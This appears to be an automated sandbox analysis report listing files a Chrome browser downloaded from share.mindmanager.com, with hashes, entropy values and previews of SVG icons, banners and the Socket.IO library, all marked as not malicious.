                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_8215)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#D6E6FB"/>..<path d="M616.4 95.3761C616.4 117.601 604.862 137.81 590.75 152.837C575.398 169.185 538.4 182.599 518.4 178.999C498.4 175.399 503.2 161.399 486.8 145.399C470.4 129.399 431.1 115.834 431.1 86.7336C431.1 53.0596 450.007 21.7512 480.4 12.9983C495.438 8.66769 523.6 5.79835 550.8 12.9985C578 20.1986 595.323 33.2979 609.6 59.3982C616.134 71.343 616.4 80.8068 616.4 95.3761Z" fill="#A7C9F3"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M625.688 115.03C621.496 99.3839 605.414 90.0989 589.768 94.2912C574.122 98.4835 564.837 114.565 569.029 130.211C573.222 145.857 589.304 155.142 604.95 150.95C620.595 146.757 629.88 130.675 625.688 115.03ZM58
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):964
                                                                Entropy (8bit):4.963613419478053
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7E709BA0868E18467CC3B09243A3E6B5
                                                                SHA1:2B3E51159B257EAEB9AD32EB5369D402CAE88E42
                                                                SHA-256:FEF593D5BDA5FAE32CA7BE08A6707FF349A592AEF0A35787D9152111E19FE92F
                                                                SHA-512:00E7272686005D96C2B5C3218BB074CD7C319EBBCBD6471BBAD62B035338A60491315C9E668070B61C043BE05E1960A55D56E91BA0F1DE4AC17A682682B5F131
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-dots.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="10.5" height="2.5" viewBox="0 0 10.5 2.5">. <g id="Group_1546" data-name="Group 1546" transform="translate(-5572 -3770)">. <g id="Ellipse_268" data-name="Ellipse 268" transform="translate(5572 3770)" fill="#2d6bac" stroke="#2d6bac" stroke-width="0.45">. <circle cx="1.25" cy="1.25" r="1.25" stroke="none"/>. <circle cx="1.25" cy="1.25" r="1.025" fill="none"/>. </g>. <g id="Ellipse_269" data-name="Ellipse 269" transform="translate(5576 3770)" fill="#2d6bac" stroke="#2d6bac" stroke-width="0.45">. <circle cx="1.25" cy="1.25" r="1.25" stroke="none"/>. <circle cx="1.25" cy="1.25" r="1.025" fill="none"/>. </g>. <g id="Ellipse_270" data-name="Ellipse 270" transform="translate(5580 3770)" fill="#2d6bac" stroke="#2d6bac" stroke-width="0.45">. <circle cx="1.25" cy="1.25" r="1.25" stroke="none"/>. <circle cx="1.25" cy="1.25" r="1.025" fill="none"/>. </g>. </g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1105
                                                                Entropy (8bit):4.8114717182919025
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:18918CAC46FC051A09F052CE2BAB08D2
                                                                SHA1:8AF18D1049B931DD2586A38B09C15BE1D58AF950
                                                                SHA-256:06145D4D422028FDCD9EF594EFE7F357CF9B02159803E70DD71AE74E75D9000E
                                                                SHA-512:9F9048DAA6AF2584DDD7913284533521388C097DDE79EF1779649575670423EDDA9302E5FC40765E9AE063C893A41FA7F4B291187ACB1C44AE6A59D8283F2BDF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/inspector/group-notes.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 44 30">. <defs>. <style>.cls-1{fill:#3a52a4;}.cls-2{fill:#28559c;}. </style>. </defs>. <title>notes toggle off. </title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <rect class="cls-2" x="17" y="10" width="5" height="1"/>. <rect class="cls-2" x="17" y="15" width="8" height="1"/>. <rect class="cls-2" x="17" y="13" width="8" height="1"/>. <rect class="cls-2" x="17" y="17" width="6" height="1"/>. <rect class="cls-2" x="17" y="19" width="4" height="1"/>. <polygon class="cls-2" points="27 14 28 14 28 11.67 27 10.33 27 14"/>. <polygon class="cls-2" points="15 8 25 8 23.66 7 14 7 14 23 20 23 20 22 15 22 15 8"/>. <polygon class="cls-2" points="26.4 10.28 24.7 8.64 23 7 23 12 28 12 26.4 10.28"/>. <polygon class="cls-2" points="28.77 17.5 29.93 16.34 29.2 15.62 28.48 14.89 27.32 16.05 28.77 17.5"/>. <polygon class="cls-2" points="26.22 17.15 25.5
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1389
                                                                Entropy (8bit):5.0124001884827045
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:60C32C5037C95A86E0878C45C81BB3B5
                                                                SHA1:D2F0542E5A29382623F2BCFD4AB0FCD3577486E0
                                                                SHA-256:77E61E924DCC114CDCE29283A7F1D50E4C3FFF19F552C1DB0B524FDDB8D35883
                                                                SHA-512:CCE81EB730CD3836C8683D72868ADEB139D26A43EF3AE86EFBD705D21E77DD024D2466D126D4ACFCAAEA0B07938FC82CE7A80DB47D5A4640FACEB5F3C9DC3B73
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.9 20.04"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#c1272d;}.cls-3{fill:#ea969d;}.cls-4{fill:none;stroke:#c1272d;stroke-miterlimit:10;stroke-width:1.43px;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M11,10h8V5.93L13.07,0H1A1,1,0,0,0,0,1V19a1,1,0,0,0,1,1H6Z"/><path class="cls-2" d="M4,1h9a0,0,0,0,1,0,0V4.56A2.44,2.44,0,0,1,10.56,7H6.44A2.44,2.44,0,0,1,4,4.56V1A0,0,0,0,1,4,1Z"/><polygon class="cls-3" points="6 19.5 2.5 19.5 2.5 12 10 12 6 19.5"/><rect class="cls-3" x="10" y="2" width="1" height="4"/><path class="cls-2" d="M14,0H1.67A1.67,1.67,0,0,0,0,1.67v17S.25,20.33,1.17,20H6V19H1.42A.42.42,0,0,1,1,18.58V1.42A.42.42,0,0,1,1.42,1H14l4,4v5h1V5Z"/><path class="cls-4" d="M2.5,20V13.62c0-1.17.47-2.12,1-2.12H11"/><path class="cls-3" d="M10.71,19.42a.69.69,0,0,1-.6-.35.68.68,0,0,1,0-.7l4-6.62a.7.7,0,0,1,1.19,0l4,6.62a.69.69,0,0,1-.59,1.05Z"/><path class="cls-2" d="M14.6
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1359
                                                                Entropy (8bit):5.082409650534498
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:24A0B1C8C788BA49D5AE457A93BF0088
                                                                SHA1:4369ABE0D842ECBF41F53CC5DBE40F0DCDB8C5FB
                                                                SHA-256:E783A5333F66C05B09C9CD9BA5A0E366D2377D0B7586175464E47BDBB1D333A9
                                                                SHA-512:E40CEFB339E71426EFE40B0893A13899ADD48C58E6F999E7FD57CBC2AE40AD0CD922841A94A6054FCF976788D25A30A8694D04A82D2D087BA11BCA50A0A80F72
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_smart_bg_object.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 22 24"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#4f8ed4;}.cls-3{fill:#7db7ea;}.cls-4{fill:gray;}</style></defs><title>insert smartshape</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><rect class="cls-1" x="0.5" y="0.5" width="21" height="23" rx="1.5"/><path class="cls-2" d="M20,1a1,1,0,0,1,1,1V22a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V2A1,1,0,0,1,2,1H20m0-1H2A2,2,0,0,0,0,2V22a2,2,0,0,0,2,2H20a2,2,0,0,0,2-2V2a2,2,0,0,0-2-2Z"/><path class="cls-3" d="M2.17,23.5A1.67,1.67,0,0,1,.5,21.83V14.5h21v7.33a1.67,1.67,0,0,1-1.67,1.67Z"/><path class="cls-2" d="M21,15v6.83A1.17,1.17,0,0,1,19.83,23H2.17A1.17,1.17,0,0,1,1,21.83V15H21m1-1H0v7.83A2.17,2.17,0,0,0,2.17,24H19.83A2.17,2.17,0,0,0,22,21.83V14Z"/><rect class="cls-4" x="3" y="3" width="7" height="3" rx="1.5"/><rect class="cls-4" x="3" y="9" width="7" height="3" rx="1.5"/><rect class="cls-4" x="12" y="9" width="7" height="3" rx="1.5"/><polygon class="cls-2" points="21
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):366
                                                                Entropy (8bit):5.036985390600341
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A084315EA6EADC065C388A7CE0B515E1
                                                                SHA1:31BBC8A38991E8A3DFB48E7E0C64E461566D8A09
                                                                SHA-256:EBB1FE59C29F08B6545B17AFC2DC32ABF1051020FD0E68519B5C0460800B2D5D
                                                                SHA-512:B255814029799E5336E774FE3D850A544B85DF429511FD0DC3A6E3C55446870F06CA09CC13D64F5C2D575837AD90A3FC695B395F34D5DF422A40CC09B52009F0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/exclamation-mark.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#333;}</style></defs><title>signs_8_16</title><polygon class="cls-1" points="8 0 0 16 16 16 8 0"/><rect class="cls-2" x="7" y="5" width="2" height="7" rx="1" ry="1"/><rect class="cls-2" x="7" y="13" width="2" height="2"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3296
                                                                Entropy (8bit):4.396961349487115
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:814AC846A8B36E2A0D8AB2471422C580
                                                                SHA1:C729C361143AF92F6852B49AF37ADBE91E2B077A
                                                                SHA-256:7CD36960DDCA158D6F24588DEACA34BE79AC92A3C7617746EE6429396400D41A
                                                                SHA-512:C5265EBB2FE905E9678C6C1B25256293685F1FC1AFF9884C272D4D753DC80ACB121FAB6550A5A6CC4CB8FEB278E01031D2464E1370DEC0D7C33686D169B1C5D0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/mm-file-teal.svg
                                                                Preview:<svg width="33" height="33" viewBox="0 0 33 33" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1246_12430)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9277 0.549927L28.9277 7.54993V25.438C28.2807 24.9702 27.5041 24.7382 26.6988 24.7328C25.8743 23.4256 24.4173 22.5571 22.7575 22.5571C20.5652 22.5571 18.7268 24.0722 18.232 26.1123C16.8136 26.9278 15.8652 28.4089 15.8652 30.1007C15.8652 30.9993 16.1328 31.8384 16.5961 32.5499H7.92773C6.27088 32.5499 4.92773 31.2068 4.92773 29.5499V3.54993C4.92773 1.89307 6.27088 0.549927 7.92773 0.549927H23.9277Z" fill="#4EB0B3"/>.<path d="M28.4277 8.79993H23.4277C23.2897 8.79993 23.1777 8.688 23.1777 8.54993V1.04993C23.1777 0.911856 23.2897 0.799927 23.4277 0.799927H23.7227C23.804 0.799927 23.8803 0.839496 23.9271 0.906003L28.6322 7.58866C28.6618 7.63079 28.6777 7.68106 28.6777 7.73259V8.54993C28.6777 8.688 28.5658 8.79993 28.4277 8.79993Z" fill="white" stroke="#4EB0B3" stroke-width="0.5" stroke-linecap="round" stroke
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3327
                                                                Entropy (8bit):4.833391227298949
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B6116B4F253CA84185C38CB04B9B9E72
                                                                SHA1:716F339ABA68D6475D3829708A4863FCE34ACD92
                                                                SHA-256:8B41B4ED70B2085A9DC267043B87E1DE6A1F44856A0A2CDDF9277580DD15845C
                                                                SHA-512:A945AEB6D4437F210DEB2B971FA39FBCC5EBD456ACE465114DAD4153E057101BE89F9797F8BCDAB61469038E95F2E75B6FB43A3EA5EB99C2F081E75EC4B3CA34
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/leancanvasmodel.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="45.9932" y="2" width="24.6459" height="31.7281" rx="2" fill="#F6AC94"/>.<rect x="99.9805" y="2" width="24.6459" height="31.7281" rx="2" fill="#E9DB63"/>.<rect x="45.9932" y="35.9922" width="24.6459" height="31.7281" rx="2" fill="#FFD8AE"/>.<rect x="99.9805" y="35.9922" width="24.6459" height="31.7281" rx="2" fill="#C3E0CF"/>.<rect x="19" y="2" width="24.6459" height="65.7225" rx="2" fill="#FF744D"/>.<rect x="72.9883" y="2" width="24.6459" height="65.7225" rx="2" fill="#618A8B"/>.<rect x="126.975" y="2" width="24.6459" height="65.7225" rx="2" fill="#B8C117"/>.<rect x="19" y="69.752" width="65.0091" height="18.2503" rx="2" fill="#164D7C"/>.<rect x="86.6064" y="69.752" width="65.0091" height="18.2503" rx="2" fill="#198C9A"/>.<rect x="48" y="21" width="10.4723" height="10.4723" fill="white" fill-opacity="0.2"/>.<rect x="59" y="11" width="10.4723" height="10.4723" fill="white" fill-opa
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):867
                                                                Entropy (8bit):5.083699041789025
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DAC5F8B756B1250BE59391A3D0940F67
                                                                SHA1:1B6B3568E86871A46D1DAA3DE42AA037448DC68D
                                                                SHA-256:DFB60E17B3C2021D5C84579FAC17B7598D4D8F1C0DDF372801382D6056049F09
                                                                SHA-512:537F3DFD577099743823A511C2FDA4E434223BC89B47A8E7BE914148751EDDABF3BBA0F0099AFBBF679B52022A69425D321B61BA0BD41887A066994AB993CEEA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/bomb.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}.cls-2{fill:#b3b3b3;}.cls-3{fill:#5d5d66;}.cls-4{fill:#fff;}.cls-5{fill:#f8804a;}</style></defs><title>bomb_16</title><polygon class="cls-1" points="11.5 0 11.98 1.34 13.27 0.73 12.65 2.02 14 2.5 12.65 2.98 13.27 4.27 11.98 3.65 11.5 5 11.02 3.65 9.73 4.27 10.35 2.98 9 2.5 10.35 2.02 9.73 0.73 11.02 1.34 11.5 0"/><rect class="cls-2" x="7" y="2" width="1" height="3"/><rect class="cls-2" x="8" width="1" height="3" transform="translate(10 -7) rotate(90)"/><circle class="cls-3" cx="7.5" cy="10.5" r="5.5"/><ellipse class="cls-4" cx="10.5" cy="8.5" rx="1.44" ry="1.56" transform="translate(-2.93 9.92) rotate(-45)"/><rect class="cls-3" x="6" y="3" width="3" height="3" rx="1" ry="1"/><circle class="cls-5" cx="11.5" cy="2.5" r="1.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1418
                                                                Entropy (8bit):5.09837554034104
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C6910F0795A4EA80579716603D2EB9C8
                                                                SHA1:9DE386F5BC17E1A90D08258904844CC068C7E16D
                                                                SHA-256:530B76E9063A4CC0DF666A89914340D3CA1D7776B8DCE77BA695339CBE00D721
                                                                SHA-512:42AEE7B34D2C760AEF16B71E2094CAF2BD3FBA1741FA2A5B0C436EBC9A510EB7B4A09DFF037DF097ECC27BDAE0216C4D325E4C7A240F979A3E01906D5888B1C9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/emergency.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}.cls-2{fill:#9a9aa3;}.cls-3{fill:#767677;}</style></defs><title>alarm_16</title><path class="cls-1" d="M10,14V10.12A2.57,2.57,0,0,0,8.5,7.58C7.18,7.17,6,8.42,6,10v3.5l.4.5H10Z"/><rect class="cls-2" x="2" y="12" width="12" height="3" rx="1.25" ry="1.25"/><path class="cls-3" d="M15,15V14c0-.27-.2-.5-.44,0H1.44C1.2,13.5,1,13.73,1,14v1Z"/><path class="cls-2" d="M5.19,14a3.9,3.9,0,0,1-.3-1.5V9.08A3.54,3.54,0,0,1,7,5.68c2.14-.76,4.12,1,4.12,3.32v3.5a3.9,3.9,0,0,1-.3,1.5h1A5.23,5.23,0,0,0,12,12.5V9.19A4.56,4.56,0,0,0,8.85,4.6C6.29,4,4,6.21,4,9v3.5A5.23,5.23,0,0,0,4.23,14Z"/><rect class="cls-1" x="8" y="1" width="1" height="2" rx="0.5" ry="0.5"/><rect class="cls-1" x="14" y="8" width="2" height="1" rx="0.5" ry="0.5"/><rect class="cls-1" x="13" y="4.5" width="2.5" height="1" rx="0.5" ry="0.5" transform="translate(-0.59 7.79) rotate(-30)"/><rect class="cls-1" x="11" y="2
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):450
                                                                Entropy (8bit):5.062386756024502
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:54F349F626AB23BE3A6E3559245DB8C5
                                                                SHA1:A91AA9A73DB446815F61C3C4E0E2B7026DE1FDE8
                                                                SHA-256:F1D5F366EBCAD5D02BD9C8283220EDD8DCD93F69814BB662A4044F55E9243DFE
                                                                SHA-512:8082E860C8A8485300D25C1D178C5E3B1DDE566E105BE1B88E678E79F3300B5AEAE0D8DBE6CE024CEF1F719ABFE26A5F0F97201A638562ECF9B3BE0149B928C3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/check-button-white.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 15"><defs><style>.cls-1{fill:#FFFFFF;}</style></defs><title>check</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M5.31,15a.39.39,0,0,1-.16-.11l-5-5a.5.5,0,0,1,0-.7A.48.48,0,0,1,.5,9a.48.48,0,0,1,.35.15L5.5,13.8,19.15.15a.5.5,0,0,1,.7,0A.48.48,0,0,1,20,.5a.48.48,0,0,1-.15.36l-14,14a.39.39,0,0,1-.16.11.55.55,0,0,1-.38,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (45667)
                                                                Category:downloaded
                                                                Size (bytes):45806
                                                                Entropy (8bit):5.207605835316031
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                                SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                                SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                                SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                                Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):37019
                                                                Entropy (8bit):4.260364824333596
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AD6A11CEC1A18AAF59DF095981AF3AAD
                                                                SHA1:097FA0C0090A218225EEA6CBE0C99ECCA7CBC0C1
                                                                SHA-256:056D48FFA8345054FE426BDB2C7938A2C08ECB6BC038B82C543DACDD4F4F47EB
                                                                SHA-512:CB76B4E3AA229F6FBAEC427A357C6C889D041E2B056DBA8B3E5A5E0BEF889D42982AB8119B32207831374F5080B964D7CE92177BF2BE0750AEE761F2A6F4B558
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_writing_documentation.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_7200)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#FFDAC3"/>..<g clip-path="url(#clip1_456_7200)">..<path d="M610.952 55.2773C606.127 32.8921 589.19 15.2877 568.239 7.36957C547.288 -0.548536 522.805 0.645672 500.141 8.10587C470.579 17.8359 442.782 39.1938 429.37 67.9501C415.957 96.7063 419.506 132.545 441.35 151.415C451.848 160.484 467.356 165.241 481.175 159.193C494.493 153.363 503.347 139.072 516.592 133.028C540.321 122.201 566.895 139.799 589.805 122.015C607.984 107.903 615.197 74.9735 610.952 55.2773Z" fill="#F5C2A2"/>..<path d="M544.365 159.249H503.111C507.7 154.473 508.523 148.627 508.622 142.512C508.628 142.001 508.633 141.491 508.633 140.98V133.789H538.842V140.98C538.843 147.65 539.397 154.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1264
                                                                Entropy (8bit):3.9829583894167198
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D1C5873CA30CD8BA2C3D65E958438564
                                                                SHA1:0C53DEDB8FEAAEB58C59F9153BE54B16C0F79B0B
                                                                SHA-256:57B20867F7CD0D536CC05C199E14725DAE264D7920F1F939EAA05FB322899083
                                                                SHA-512:D4A280E5CEC6DC7A3AD6796E2366587B1AB9442C1214827966B25CFEF9541371294027BA8FF034A97C811CBFB909C6BBC07CB58A9FF2456D797B11139598B9D5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/text-format-bold-new.svg
                                                                Preview:<svg viewBox="0 0 40 50" xmlns="http://www.w3.org/2000/svg">.<path d="M13.6309 34V17.048H19.4289C20.3129 17.048 21.1276 17.1173 21.8729 17.256C22.6356 17.3773 23.2943 17.6026 23.8489 17.932C24.4209 18.2613 24.8629 18.6946 25.1749 19.232C25.5043 19.7693 25.6689 20.4453 25.6689 21.26C25.6689 21.6413 25.6169 22.0226 25.5129 22.404C25.4089 22.7853 25.2616 23.1406 25.0709 23.47C24.8803 23.7993 24.6463 24.094 24.3689 24.354C24.1089 24.614 23.8056 24.8046 23.4589 24.926V25.03C23.8923 25.134 24.2909 25.2986 24.6549 25.524C25.0189 25.732 25.3396 26.0006 25.6169 26.33C25.8943 26.6593 26.1109 27.0493 26.2669 27.5C26.4229 27.9333 26.5009 28.436 26.5009 29.008C26.5009 29.8746 26.3276 30.62 25.9809 31.244C25.6516 31.868 25.1836 32.388 24.5769 32.804C23.9876 33.2026 23.2943 33.506 22.4969 33.714C21.6996 33.9046 20.8416 34 19.9229 34H13.6309ZM17.4529 23.834H19.2469C20.1829 23.834 20.8589 23.652 21.2749 23.288C21.7083 22.924 21.9249 22.4386 21.9249 21.832C21.9249 21.1733 21.7083 20.7053 21.2749 20.428C
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):726
                                                                Entropy (8bit):7.658584865417114
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B8A0BF372C762E966CC99EDE8682BC71
                                                                SHA1:2D7C9B60D1E2B4F4726141DE2E4AB738110B9287
                                                                SHA-256:59BFE9BC385AD69F50793CE4A53397316D7A875A7148A63C16DF9B674C6CDA64
                                                                SHA-512:6883C7A3F702FB3DF5E698333C8A05705970FCB476A31A2008444A02122B6870DE158176C86A1F6605A0783B88D3523646B4D288696E777B37CC02D5D95266CA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:"https://t2.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=https://btEe.pradjoun.com&size=16"
                                                                Preview:.PNG........IHDR................a....pHYs...........~.....IDAT8..S.O.Q....nK.P.T[.B."D0..R.9..!..Y.*.....c.x.h..U......T..Z.Yh.-..B.oFk..N....x.7..S.^......L&..\.....8b..b.....U'.y.Wv..SV.y^J.I...;........~l..../.>[............Mf.....l......-....m6s...F.....s......%_ .)@....C.pT1...C....lf..'ig........\..B.0.j....=J.x..K.{..x..414wn....c.@............o.=f.p.[.tv..@....;...^]?....`.&&..t:-....L..f....xaG>.....0....EUs....o...j....]...P..UY.....D..w../.V....}..(.......v.P\g.}..a.\.;..v..G.......#n..........?.i...CN)..w!.:K.V..=.{.1x@....>2......Y.o@._..g...J..B....2.$X@D...W2<..fZ\............z......wj.<..+.x...t...r-<..~[.c.&.Y8=L.....{.g.Tu.`..6G..5.%...?...._..X!.^........IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1395
                                                                Entropy (8bit):4.816556339761037
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3CFC4C099F89DFE7E64F4454C7087B2A
                                                                SHA1:B397D87CA09692C4C8A5774C0AAA9C802B055E1B
                                                                SHA-256:E03942C8CF226A5B505EE423D888C9CA401CBB65862489619246F01B82FDF04F
                                                                SHA-512:994168A105E9E77AD9C56F4E71F540DCF3D44AE76EC9364CBF0C7139CFBAF41A3C37122B33BFB6E07DC9D4E400D2FBEDFF693D54824A1824FC9F72EEDAD263C7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority03.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#79c516;}.cls-2{fill:#2eaf34;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority03</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.6,12.22l1.12-2a2.64,2.64,0,0,0,2,.93,1.55,1.55,0,0,0,1-.29.93.93,0,0,0,.36-.74C10,9.38,9.44,9,8.26,9H7.85L7.34,7.57,8.65,6c.14-.17.28-.34.43-.49a3.71,3.71,0,0,1,.33-.34L9,5.05V5c.3.05,0,.07-.43,0H6V3h6V4.59L10.07,7A2.82,2.82,0,0,1,11.75,8.1,3.16,3.16,0,0,1,12.37,10a3.68,3.68,0,0,1-.92,2.51,3.3,3.3,0,0,1-2.6,1.05A4.19,4.19,0,0,1,5.6,12.22Z"/><path class="cls-3" d="M4.6,11.22l1.12-2a2.64,2.64,0,0,0,2,.93,1.55,1.55,0,0,0,1-.29A.93.93,0,0,0,9,9.15C9,8.38,8.44,8,7.26,8H6.85L6.34,6.57,7.65,5c.14-.17.28-.34.43-.49a3.71,3.71,0,0,1,.33-.34L8,4.05V4c.3.05,0,.07-
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
